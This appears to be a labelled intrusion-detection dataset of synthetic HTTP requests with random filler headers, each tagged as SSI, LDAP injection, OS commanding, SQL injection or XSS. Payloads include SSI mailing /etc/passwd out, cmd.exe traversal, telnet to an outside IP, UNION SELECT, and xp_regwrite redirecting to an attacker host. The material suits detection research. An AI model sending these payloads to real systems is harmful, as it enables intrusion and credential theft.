Cookie: _b@jplocation4Ob=88ioRitbodynetcatr$9h&)htpasst|Eh;ZcopyJngroup byZUznoND=eeteysmt0lsBl;Idpln9nnhDn6gm2=<hstm1ocir;d9ctsddawau=npt@to  r/9(1passthruiselect 
Cookie2: $Version="545"
Date: Thu, 09 Oct 08 09:41:18 CET
ETag: W/"-gXHqWTuyFHb9trO"
Expect: mAnknsm
From: eieolton@oosl.de
If-Modified-Since: Thu, 23 Feb 06 15:12:57 GMT
If-Unmodified-Since: Sat, 05 Jun 04 11:38:47 GMT
If-Match: *
If-None-Match: *
If-Range: "xsSLm8RVhjdXiTs"
Max-Forwards: 822
MIME-Version: 0.2
Pragma: erlhSon='au'
Proxy-Authorization: Basic RWhzaWU6b05ub2U=
Authorization: NTLM dktmdHRSaXl1OGNtaWF0bGV0Z0Fzc3hvcm9SdXc5T3Q=
Range: 22-,852303-,3-
Referer: http://WAhS.fr/prYs/iidun/adloe.js
TE: gzip;q=0.6,deflate;q=0.8,trailers
Trailer: TE
User-Agent: ekhN9 (t5m_d-Bw; snPaow_X; tlo-8eojv; oBCmEAodt)
UA-CPU: PowerPC
UA-Disp: 0811,223,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2187x3503
Via: 9.2 www.i1le2l.htm
Transfer-Encoding: deflate
Upgrade: atsa/8.3
Warning: 781 255.112.125.38 "ehmjCimcbjUud9qrtdru" 
X-Forwarded-For: 119.148.205.131
X-Serial-Number: 870651819
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47524
Start - Id: 39266
class: SSI
GET /novtfipslrtyroscbl/xp_XMH/2LeG-eJgBc-9ZL5r.cgi?f6t=aiei&NihE=19&3bs@S=0184&lwstAtmicrdirrd=c7s6og%25sn+group+byworb&9scriptBehttpEy=%3C%21--%23email+fromhost%3D%22www.eoymrc.com%22+tohost%3D%22mailbox.ctuie.com%22+message%3D%22Llt8o+r5mef6+kh+rogc%22+fromaddress%3D%22tnolr.com%22+toaddress%3D%22mor.ne.com%22+subject%3D%22mt7%22+sender%3D%227t.com%22+replyto%3D%22dnlEh.com%22+cc%3D%22re%22+inreplyto%3D%22yd3ed+use8+roo%22+id%3D%22otlmail%22+--%3E&te=gnk&it1iAu=iuth7gteomo1Opea&Nemt=5&aimlgk4atwgic8=%24%5Dj&s4tpezkicc=s%2Feeote1s&rtt=xpen&t6mNtsNH4ow=2504&nbd=%7C HTTP/1.1
Host: 205.65.2.137
Connection: emeQrzln
Accept: video/quicktime, application/postscript;q=0.7, text/*
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.8, deflate;q=0.9, gzip, compress, gzip
Accept-Language: nd-dtNQ5
Cache-Control: no-cache
Client-ip: 128.247.28.202
Cookie: dntyRiqeeolrl=aw_;rdqevr4tanibyh=9377;des5tchot=03429728;eheoe2if=)tr8oeid2rt4;Af
Cookie2: $Version="1"
Date: Fri, 25 Apr 08 02:42:51 UTC
ETag: "D-z96M8ycA6F5inRJv@"
Expect: tnhoioon=ntmu;ndEx1r
From: ogpe@eKhmc.uk
If-Modified-Since: Sun, 29 Mar 09 08:35:32 GMT
If-Unmodified-Since: Thu, 11 Nov 04 22:47:46 CET
If-Match: *
If-None-Match: "DhzSYXLynhg3EnV5hUhi"
If-Range: *
Max-Forwards: 0023
MIME-Version: 1.6
Pragma: ipms='Mo0adag'
Proxy-Authorization: NTLM dGs2bnNEZXBhN2h0dG5ldlFCbnlkQXN0c25tcmFrb1B0YXVzbXlJbm9paFBsaTE=
Authorization: Digest uri=/csEurep/9ottyo/rtsntoL/sdeseoi/ntxejrtw.php4
Range: 864-,5323-,-8736
Referer: http://phoxroe.fr/2htEamZi/wblechcl/rdaste6w.cfm
TE: gzip,trailers
Trailer: Expect
User-Agent: dEktwehnsedpfwh
UA-CPU: MIPS
UA-Disp: 3603,824,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8684x662
Via: 2.4 www.l4t0snar.shtml, FTP/2.8 www.laped.shtml
Transfer-Encoding: compress
Upgrade: etsi/0.2, 42Nn/6.7
Warning: 014 58.200.111.202 "ltrIo" 
X-Forwarded-For: 237.101.171.41
X-Serial-Number: 2940498240401251
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39266
Start - Id: 37951
class: LdapInjection
GET /ef_2b_1Gh3XZjPRn/iwwtaikateh8muwei/Y4QRYRpG41Zr/cRG-2Qrw.DojJ/nB/meuDYZjbdviWB/K76lL.JOEPo0wy/_YconnectnSkUtJNmQf/tmAdnMG64p7LlJO/TaejihyaAt.css?Zcnrsmcr=8535%29%28%26%28objectClass%3Dif2%29%28%7C%28sn+%3D+++bVw%29%28cn%3Dsdzr+++++J*%29%29&iIpntae7ulaor=Tsh2en9Nmkr&rifcnwno7=92959499&cgu6Hem=xtTnrbin&lieae=749833&ssibBoIhy1os=och&EiccoI8snh4=yFa-Gv&sxshh=%7EMe1a+b&esvt9cyeornle=0536&q1YlPF=kszbo&hTl=uraarmRt&rale1nyn8odeEgG=oexec25n&6nht=nr%5Daccess_logreplace0dfromeases HTTP/1.0
Host: 25.232.64.69:80
Connection: keep-alive
Accept: application/postscript
Accept-Charset: *;q=0.7
Accept-Encoding: deflate;q=0.3, gzip;q=0.0, deflate
Accept-Language: eKNelnh-saad, 4-rMrs
Cache-Control: u9n='gddan'
Client-ip: 114.98.193.54
Cookie: sexaxC7bt=dA Tc;hOetqew=174164
Cookie2: $Version="2"
Date: Sun, 08 Jan 06 22:18:55 CET
ETag: "OGfjiId4vLFj8EUFd1BJ"
Expect: 100-continue
From: p2udarel@zentnnsmu.org
If-Modified-Since: Fri, 01 Apr 05 17:43:18 UTC
If-Unmodified-Since: Tue, 30 Dec 08 20:19:26 UTC
If-Match: *
If-None-Match: "d4FnF1Tgb6vM4fuf@MX"
If-Range: "Z9GSYhhH@gCig1s"
Max-Forwards: 46
MIME-Version: 0.1
Pragma: Dn6mco=prqs
Proxy-Authorization: Digest username="toobo"
Authorization: Digest uri=/jrs8/tehhzt/heNhe.bin
Range: 648492-,076146-138301,-5163
Referer: http://www.eoie4C6.uk/ooiio/iL86cea.pl
TE: gzip;q=0.0,gzip;q=0.0,gzip;q=0.6
Trailer: If-Range
User-Agent: Mozilla/9.4 (compatible; Konqueror/1.9; Linux i386; lile8E; oe7dIe8r)
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8848x2681
Via: 4.9 125.58.4.176, gfto8/9.7 118.243.94.23
Transfer-Encoding: deflate
Upgrade: spoM3/2.4, sus/6.4, cez/4.2
Warning: 209 www.aRtos.png "mgfiafudiih" 
X-Forwarded-For: 82.192.128.217
X-Serial-Number: 8812591
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37951
Start - Id: 43630
class: OsCommanding
PUT /3fcPe/tW/ajwtJgam/t5-9pkt0T/ttk3nasOgw4/ntsoeaitalpr0/nkvFP.shtml? HTTP/1.0
Content-Length: 241
Content-Language: nehZs
Content-Encoding: identity
Content-Location: /brlg9a/bFquloi/1arspRh/ierjl/rh17aabg.sh
Content-MD5: T2Zvb3RpdGhUNWU2dWhicw==
Content-Type: application/x-www-form-urlencoded
Host: 231.178.221.211
Connection: rndd
Accept: image/jpeg;q=0.6, image/jpeg
Accept-Encoding: compress;q=0.5
Accept-Language: *
Cache-Control: no-store
Cookie: idlntmWm=R0;dhe8e=ptf;ao=oHl@niSnXcB;xlinkVdivZojG0p=mzb;E.crnFC=cj8r
Date: Sat, 29 Dec 07 19:16:00 CET
If-Match: "GDqIsan2sxsXo@rvP"
Max-Forwards: 0720
Referer: http://4lf5oo.net/odrinown/iarvwNyw/tlidk0.gif
Trailer: Expect
User-Agent: %0a     cat %0a   /etc/passwd %0a
----: ----------------------------------

tftwitcE=rhqx3&unionCCnull=oa8eheedlaiscodEqn&38MH=udeo)oe&agHeeeaioce=98814&isoq2eeoidt7n=ehcdlhn&mtec0whmlp=594792&avemsi9tOdcjen=19115473&cU5f=awlyteoUnds&Ggoh=25265&9sRsr0i62R=ywwe~&nnieTgVetIs=cLHTqE-0p&Ooae=\gr&tabRs5oic=neFhsocd

End - Id: 43630
Start - Id: 44024
class: OsCommanding
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 1.199.129.204
Connection: erher0
Accept: audio/x-wav, application/postscript;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 78.141.142.69
Cookie: fMFfevalAmPw=hTLBb
Cookie2: $Version="698"
Date: Fri, 10 Feb 06 20:41:56 UTC
ETag: "Ulw7dIb1rT0S2qp-n1I"
Expect: oOei72
From: 44fa@mshrPyo.gov
If-Modified-Since: Tue, 03 Oct 06 01:18:37 UTC
If-Unmodified-Since: Sun, 30 Mar 08 04:11:40 UTC
If-Match: *
If-None-Match: *
If-Range: "ZZTIp7HQ-VDqzbR@y5k"
Max-Forwards: 936
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM aXNEZnNoaXNvYTBkZjFwdG5hc25xY2dBdGN0dGhzNE5ldWluZmxwTw==
Authorization: Basic dGh0Y25hYTo4dGlvU3o=
Range: 67-764741,470518-20,3-202913
Referer: /at3ao/e9NiS/hr2ntn.php4
TE: gzip;q=0.4,chunked;q=0.9,gzip
Trailer: Host
User-Agent: Mozilla/2.8 (X11; U; Unix 5.0; TC-hn; rv:7.1.6) Gecko/45588444
UA-CPU: PowerPC
UA-Disp: 008,2196,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5667x180
Via: HTTP/3.6 0.222.205.78, 4.6 www.RsLe.gif:7524, HTTP/0.7 5.68.185.127
Transfer-Encoding: compress
Upgrade: 4nbliA/2.5, eous/5.8, fatd0y/7.3, htsLm/7.0, ejSl/2.7
Warning: 912 248.158.243.227:1807 "eareZo" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44024
Start - Id: 37495
class: LdapInjection
GET /rgpasswdNV-e1Lx/bbp7oAr9mhgeOOawsort/eOa4WYhG2DCY0Wf.php? HTTP/1.0
Host: 102.136.131.250:699
Connection: lqihia
Accept: audio/*;q=0.8, video/mpeg, audio/*
Accept-Charset: iso-8859-4, x-mac-chinesesimp, windows-1252, gb2312, utf-7
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 118.8.27.231
Cookie: EZGjAnRiC=893)(&(objectClass=aoE)(|(sn   =   arn)(cn=n  J*));QdEWZLalDo=cNyMd5
Date: Fri, 26 Jun 09 17:00:12 UTC
ETag: "t6aX-TmS1_@GpX.ki17"
Expect: eoa3ev=ihHt
From: iyhwr@V7ga.uk
If-Modified-Since: Mon, 23 Aug 04 12:16:09 GMT
If-Unmodified-Since: Thu, 25 Jan 07 20:30:38 UTC
If-Match: *
If-None-Match: "_qH@sHks0BoWCdhf23"
If-Range: Thu, 03 Dec 09 04:11:43 GMT
Max-Forwards: 6797
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: tastT te7gttj=ethsB
Authorization: Basic bGFyY2hsOnRlNHd0NQ==
Range: -073
Referer: /gmawsa/eKeJ.shtml
TE: deflate;q=0.5
Trailer: User-Agent
User-Agent: psoau (aXCHjpf8Ux; 4tzubPRQ; sck-iKk6; l8dTJ-; dNfY4px6om)
UA-OS: Windows NT
Via: 1.3 148.177.241.20:8, FTP/2.2 www.w61adv.shtml
Transfer-Encoding: gzip
Warning: 813 www.aje1eeE.tiff:9 "Avrer" 
X-Serial-Number: 5649136594252322056
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37495
Start - Id: 39951
class: SSI
GET /eAahlAZzf/t_PfX0hbfIalZMCNwV/eeoY4c67agEari/CoU0fOgBGg/ndsseort/zlfEnG02AraF.html?shou7toict2nde=075&7tertrths=5&AeenmoOai0=300&geTo=884&e7c8uehikr=esamatd&ttOd=238&otfTtEid=mia&nnmaeg=aurIdhaxI%2Bw&oG_mYHkS=8865575&sMyAVciframeksfj2=%3C%21--+++%23exec++cmd%3D%22%2Fbin%2Fmail+++doO.com++%3C+++%2Fetc%2Fpasswd%22--%3E HTTP/1.1
Host: 108.20.133.19:42
Connection: 9nen
Accept: text/html;q=0.4, text/plain;q=0.5, application/rtf
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: eL-coh;q=0.7
Cache-Control: no-store
Client-ip: 225.57.174.238
Cookie: t5=5434915
Cookie2: $Version="983"
Date: Wed, 14 Sep 05 14:04:52 GMT
ETag: W/"kT0uPx4hGu-xBjDxNmhh"
Expect: 100-continue
If-Modified-Since: Sat, 18 Feb 06 15:07:05 CET
If-Unmodified-Since: Tue, 19 Sep 06 21:02:13 GMT
If-Match: "YC3lM9l2fZPIoXy@"
If-None-Match: "ltBCQCZU3tp1OEhr"
If-Range: Sat, 02 Jan 10 21:32:04 GMT
Max-Forwards: 1209
Pragma: no-cache
Proxy-Authorization: Digest response="ac4BeDAbEcd7D693f5c14DA2968662dc"
Authorization: eeooi ayrSg=eeeafn
Referer: http://www.lbweth.biz/1gida/iensaees/tztAmr.sh
TE: gzip,chunked;q=0.1,chunked;q=0.0
Trailer: Connection
User-Agent: Mozilla/6.7 (X11; U; SunOS sun4u 8.4; tN-Ri; rv:9.2.3) Gecko/48829717
Via: 7.3 116.86.183.46, 3.3 124.44.10.24, 1.7 234.76.81.24:536
Transfer-Encoding: compress
Upgrade: BEt/7.6, h1sd/6.5, roeKws/7.5, meae/9.7, Tufb6/3.7
Warning: 823 178.216.83.192 "Eiiayqjoilesatoelh" 
X-Serial-Number: 99056376178916398
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39951
Start - Id: 43356
class: OsCommanding
GET /lemDatzxarn.msf?kOeA=r4-16&SssrQstdinC=6&aaeotef2=92&7twyeP37tbprJ=en+tLonha6o&efexe0laol=%22%3B+++telnet++25.210.190.234+++80+++++%3B&imhiDw2ss5thxe=mie%7E&hesent40aneunes=nA%3A0mperecn%28stilib&hanlezk=snppl&nbatt=h%2F%27k%7EbgsoundXjTbgsoundic&ho6mdasIo=%3E+J&uAraetsh6s=5%40cR HTTP/1.0
Host: 186.197.209.222:80
Connection: NeeF
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: compress;q=0.7, compress, deflate, gzip;q=0.2
Accept-Language: ireiSit-pnsdheq, veebsq3-U, eh0rp-n;q=0.8
Cache-Control: no-transform
Client-ip: 39.142.10.38
Cookie: 0ain= i7q8;pofnewtohie=inracn6yrot;98AformR=SaosAtcieuUeeoh3
Cookie2: $Version="34"
Date: Sat, 09 Jun 07 02:23:40 UTC
ETag: W/"ohJq6m3@_FAs86ugP"
Expect: 100-continue
From: ibnemn@5dtd.it
If-Modified-Since: Sun, 11 Sep 05 19:30:57 UTC
If-Unmodified-Since: Thu, 11 Mar 10 02:56:53 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 27 Jan 10 17:44:00 GMT
Max-Forwards: 5426
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="faby1"
Authorization: Basic YWVvbXNvYXc6c3RmZWlj
Range: -44,21391-
Referer: http://dtteadt.gov/9retaa/s3twnH2l/jeedtmch.conf
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/2.2 (compatible; MSIE 8.9; Win98; Ge0Tsf)
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 331x628
Via: HTTP/0.0 68.201.151.85, eisdl/6.4 32.159.193.1:65006, HTTP/1.2 141.88.49.129:70
Transfer-Encoding: identity
Upgrade: gso/5.0, rNa5/4.2, pdodni/6.9, hdrrTE/2.2
Warning: 698 70.218.129.30 "npi5" 
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 3733669583698502
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43356
Start - Id: 44129
class: OsCommanding
GET /ssi/envout.bat?|dir%20..............1 HTTP/1.0
Host: 106.0.129.54
Connection: df2rrrs
Accept: */*;q=0.4
Accept-Charset: x-mac-cyrillic, windows-1252;q=0.8, koi8
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: max-stale
Client-ip: 196.173.120.66
Cookie: not=5;sdogvF=as;soasln=018;7tws6tqGrif=eqH mtei/processing-instructionys
Cookie2: $Version="549"
Date: Sat, 31 May 08 24:30:57 UTC
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Wed, 22 Mar 06 10:16:43 CET
If-Unmodified-Since: Mon, 02 Jan 06 19:23:03 CET
If-Match: "uyPE5HkkTKbicCYJ"
If-None-Match: *
If-Range: *
Max-Forwards: 750
MIME-Version: 2.6
Pragma: hi='eciendp'
Proxy-Authorization: 2oson 6aanekr=etytqel
Authorization: Digest realm
Range: 2856-325921,765830-7785,3752-597
Referer: /dNae/pgpp/neEnx/coea/yarfa6.exe
TE: trailers
Trailer: Upgrade
User-Agent: tl1ar (r5@wOB5WO)
UA-CPU: 68000
UA-Disp: 0410,9029,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1501x189
Via: FTP/0.0 www.t2actsl.png, 1.6 www.etndo.gif, 5.6 187.24.170.221
Transfer-Encoding: deflate
Upgrade: fnueh/3.8, a9n2i9/3.6, nbit/5.9, ydtTto/6.5, ryee5/2.9
Warning: 051 11.28.159.211 "vuojxaosel7oelrcfSe" 
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: -------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 44129
Start - Id: 36517
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: www.eonsm6.com:80
Connection: rven
Accept: video/*, audio/x-wav;q=0.5
Accept-Charset: windows-1255;q=0.7, ks_c_5601-1987;q=0.9, x-mac-ce, x-mac-korean
Accept-Encoding: *;q=0.7
Accept-Language: li-OEen7;q=0.7, 8l-Aosef6o;q=0.3, n-gpi25i28;q=0.8
Cache-Control: max-age=68
Client-ip: 138.104.69.2
Cookie: meBo6xeieeseog=wowqmt;esaid73ol1ltc=22100;z8MiP6_=1uI1s23tuI;MmesteaE=94;8UB.V06iE=3\esASa
Cookie2: $Version="7"
Date: Tue, 12 Apr 05 11:37:15 GMT
ETag: "82ovRcbDriA.HwZ_bLf"
Expect: 100-continue
From: penb1st@ydtlidrwxO.uk
If-Modified-Since: Mon, 19 Jun 06 18:58:13 UTC
If-Unmodified-Since: Sat, 23 Jul 05 07:12:40 CET
If-Match: "WhKtYqRyQhjVRSRJ"
If-None-Match: "Byw_kMDmR6jh@NH"
If-Range: *
Max-Forwards: 4392
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: 0eHre bae13=roeTol
Authorization: iSgy wib3ibfl=t0An8k
Range: 17-
Referer: http://www.sdsez.biz/tgIohOf/ptehc.swf
TE: deflate;q=0.8,gzip
Trailer: If-Modified-Since
User-Agent: Mozilla/0.4 (X11; U; Linux i586 1.5; si-yi; rv:4.9.2) Gecko/22880186
UA-CPU: 68000
UA-Disp: 0316,285,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 9877x8489
Via: HTTP/2.3 www.hc4s.css:52, 7.8 www.isetla.png
Transfer-Encoding: compress
Upgrade: r1teH/3.1, tnlo/6.6, Mbo1ue/5.1, faabak/8.4, hontz/8.0
Warning: 015 49.255.222.156 "ltge" "Mon, 28 Nov 05 13:36:16 GMT"
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36517
Start - Id: 41358
class: SqlInjection
PUT /npm3Mn6OSe/J3nph-HF2/bq0odeA/dkAuUbtHe0b05bE/DDxmochaa1XrZG/qe/7D/euiSmtizoYhak9dose2/enrastottha4zf/wn9etsb9pjfrtsayeei.mdb? HTTP/1.1
Content-Length: 240
Content-Language: r,i,sdmcn1
Content-Encoding: identity
Content-Location: http://iIe0.cz/rtdlemaH/ayoee/eei3a/z7see6.js
Content-MD5: ZWlOMWpuZTN3bW16cmVscg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 30 Nov 05 04:27:48 CET
Last-Modified: Thu, 23 Mar 06 14:25:40 CET
Host: 179.44.46.91:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.2
Cache-Control: ltO9=npt
Client-ip: 155.207.248.242
Date: Sat, 05 Jan 08 04:17:27 GMT
ETag: W/"FCG-uyh4rFkGO.a"
Expect: is7uta
If-Unmodified-Since: Fri, 05 May 06 10:33:20 CET
Max-Forwards: 6330
Authorization: Digest algorithm=MD5-sess
Referer: /qYoi.pl
TE: trailers
User-Agent: 1aae2b (eUIlzRkNy; nIjRC5eL-S; 3B5w@G_kb)
UA-Disp: 0871,7379,16
Via: 2.7 15.185.140.190:00, HTTP/6.6 80.1.206.76:509
Transfer-Encoding: gzip
Upgrade: nhetgd/3.9
Warning: 314 www.lhye.html "Tife" 
X-Serial-Number: 309660

7ey=nodehometrhHN&I3AUUaw@1o=t4O1&atsc3attnl=4464&h2ce= hi&rdt9sorseeer=next&tD=aath&mNwa3h6arawenEn=64&io=dhcyLs9cdund490h&2ys2ngo='  union select  @@version,1,1,1--&y6kIiujpps0en=gSi&5wB&ne<$e&1senestn033t5qt=h-eselect

End - Id: 41358
Start - Id: 42860
class: OsCommanding
GET /ouA986Wnetcat2/aXvp.v/i-q6bCiDexeczr.php?qdonE=ea&g4brrh2=%7C++dir++++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C+++++%2C HTTP/1.1
Host: 146.225.71.72:80
Connection: nkens
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, compress;q=0.9
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 220.191.86.68
Cookie: hiht=|dacceptnal;hqhttpsSh=q$a;etoot3crh=g8ufIBr
Cookie2: $Version="344"
Date: Fri, 06 Feb 04 14:16:08 CET
ETag: "HnExqP@.ONn5WYu362o"
Expect: ecdm
From: l6tz5hd@ruglhe.be
If-Modified-Since: Sat, 27 Oct 07 21:07:32 UTC
If-Unmodified-Since: Fri, 27 Oct 06 21:17:08 UTC
If-Match: *
If-None-Match: "175dDCQ1MMMyeNUTI"
If-Range: *
Max-Forwards: 151
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: njdei gtdN=st7gs
Authorization: Digest algorithm=rcTson
Range: 220375-
Referer: /hsdaTl/7tP2hjz/cajivwes/wRtc/3hhtfyqa.asp
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: euqz5m (a1foUO3x; ryTaT3Hi2; orBEPi; an_Kb1T.; l3HnDqzz)
UA-CPU: x86
UA-Disp: 0286,0560,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 625x3364
Via: HTTP/7.7 www.erkth.tiff, 5.4 www.monrr.css, FTP/7.5 148.61.28.128
Transfer-Encoding: gzip
Upgrade: gds/3.0, ehewef/0.6, eator/3.4, mwnet/5.2, hnta/0.2
Warning: 322 www.3aaua.png "dnycjwts1Uhnsohdc" 
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 646833
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42860
Start - Id: 36815
class: OsCommanding
GET /IxncatNhtineot/tnnXgh2/sncinTexSegsaifdtdE.cfm?naiaxboej=saar&h4tihyLrNEfi8pn=thrt&sTihbeAsl2d=leutm&h6=57&tnsirwcranjyq=ii&sr=rd&iOokcNtas=%5Cnls+%2Froot%2F&y0d1QzoptGyD=31&oocptieOaeieaa=060&1xGn_=e9mL HTTP/1.0
Host: www.heithNeua8.gov
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: euc-jp, iso-8859-6
Accept-Encoding: *;q=0.5
Accept-Language: 3r-nyh;q=0.5
Cache-Control: max-stale
Client-ip: 72.115.188.239
Cookie: oajB=i78sPVBW
Cookie2: $Version="089"
Date: Sat, 24 May 08 12:22:38 GMT
ETag: W/"IwRSCh-Gi4tuD8qE3"
Expect: 100-continue
From: snesreme@aDfeh6odeu.gov
If-Modified-Since: Sat, 22 Mar 08 17:22:53 CET
If-Unmodified-Since: Tue, 08 Mar 05 02:05:43 GMT
If-Match: *
If-None-Match: "XIxQYM2qutBnAPN"
If-Range: *
Max-Forwards: 0501
MIME-Version: 2.5
Pragma: en=h
Proxy-Authorization: Digest response="58C55118C31Bc2CeF0dbFC24cD1DCe18"
Authorization: NTLM YW5ldWFidHJtcmhuZWNkZXJubWVoZW50b3NheGRicnBtcnIwYWVhNE51YQ==
Range: -95
Referer: http://www.frdra.org/ztt8/eravD.mdb
TE: gzip;q=0.8,trailers
Trailer: If-Match
User-Agent: Mozilla/6.6 (Machintosh; U; PPC Mac OS X 1.5; oY-dc; rv:8.8.5) Gecko/71898580
UA-CPU: Sparc
UA-Color: color8
UA-Pixels: 6983x833
Via: HTTP/0.6 www.kSez9se.tiff:0881
Transfer-Encoding: identity
Upgrade: er9lae/9.7, tsv3/3.1, ouoda/7.7, rtop/0.7
Warning: 563 140.29.225.75 "tidisFr" "Fri, 10 Sep 04 18:53:07 GMT"
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 36815
Start - Id: 46949
class: XSS
POST /mco7eitri.jpg? HTTP/1.0
Content-Length: 351
Content-Language: ndst,ataAiwee,iaterv
Content-Encoding: compress
Content-Location: http://www.h6ettue.de/8bipn/nAutt/5altbtl/2Jmt/ai2ds.htm
Content-MD5: dGVuanBpaXRTcm9obWVTdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 Apr 05 04:41:52 GMT
Last-Modified: Sat, 15 Mar 08 09:36:08 CET
Host: www.eioAhp.com
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: aired2io='i'
Client-ip: 19.178.124.208
Cookie: geebansc=e8vEkOUN;eiabov0mreurf=zgNIeySc9H;zdcbinZH3=egiisxyzir\nr2
Cookie2: $Version="22"
Date: Thu, 27 Sep 07 08:45:11 UTC
ETag: "2QUjnUW_IVja0L.6aDN"
Expect: mexltil=sUytWu
From: 2cxo@n9mijtAeoE.biz
If-Modified-Since: Sat, 08 Sep 07 02:06:19 GMT
If-Unmodified-Since: Sun, 08 Jul 07 12:09:50 CET
If-Match: "S4vIIFLQRqZ8yp.V.L1V"
If-None-Match: *
If-Range: *
Max-Forwards: 740
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Basic Z2VveGk6ZXRhbjFvdA==
Authorization: EbVht ttmrelsa=rtwds
Range: -3291
Referer: http://www.psetal7x.ch/nodfs/ayvtg1mZ/sEpu1nt/NosY4C.jpg
TE: gzip,trailers,chunked;q=0.3
User-Agent: eyeee1K/7.2
UA-Color: color8
Via: 1.4 171.15.76.222, FTP/9.9 248.146.7.124
Transfer-Encoding: lukLdw
Upgrade: eOo/2.9, nd6H1f/1.0, mciu/8.9
Warning: 267 19.129.120.24 "tleaIa3" 
X-Forwarded-For: 71.176.242.104
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ko_8yUM=0320727749&oleEolE4pt=exF&uzdisste8=3erk>g&iy=<a   href    =   "    about:<s&#99;ript   >[alert    ('hutbrno');]</script   >  ">&erej0lpaaQt=c-0ALJDp&etsopihqsms6e=tBvfx&2X9Z=264700&9rt1e7eXhNg=iwp-+&YjhhCjlssnebsd6=iAa)0eunhua9hea&reahuvOhin=oA]r&gh=jEFGskqELoq&cp3uo=&]usro 4tn&Xexp_FU=7

End - Id: 46949
Start - Id: 40981
class: SqlInjection
GET /tDq38x3Bm5/hyDfpzy_8/daSojNujMEh.css? HTTP/1.0
Host: www.othrlr.fr
Connection: ntrqEdte
Accept: text/*;q=0.2, video/mpeg
Accept-Charset: *
Accept-Encoding: deflate;q=0.5, compress;q=0.4
Accept-Language: oe-n8, j-E0E;q=0.1
Cache-Control: only-if-cached
Client-ip: 63.118.232.21
Cookie: ss1aoaE=mWQvo;bUeZVnxtcsmtha=0qHetmvtu1weegwpS;3tezUadetuqagKh=exec  xp_regwrite  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','0rrrj','REG_SZ','DBMSSOCN,hackersip,80'
Cookie2: $Version="57"
Date: Mon, 15 Feb 10 17:26:26 CET
ETag: W/"3SEM@41N03GnazFlYR"
Expect: 100-continue
From: rso1@lseLdehaua.biz
If-Modified-Since: Tue, 20 Jan 04 21:57:56 UTC
If-Unmodified-Since: Tue, 04 Nov 08 19:57:30 CET
If-Match: *
If-None-Match: "VVlEfj0XAo6sO-zI"
Max-Forwards: 473
Pragma: no-cache
Authorization: 2nsb stlpntr=otegDcet
Range: 462-,-89,25-
Referer: http://www.sa11nne.cz/mLoiit/ssme/PaeoiHhy/iinT/aopdtL.jpeg
TE: trailers,trailers
Trailer: Authorization
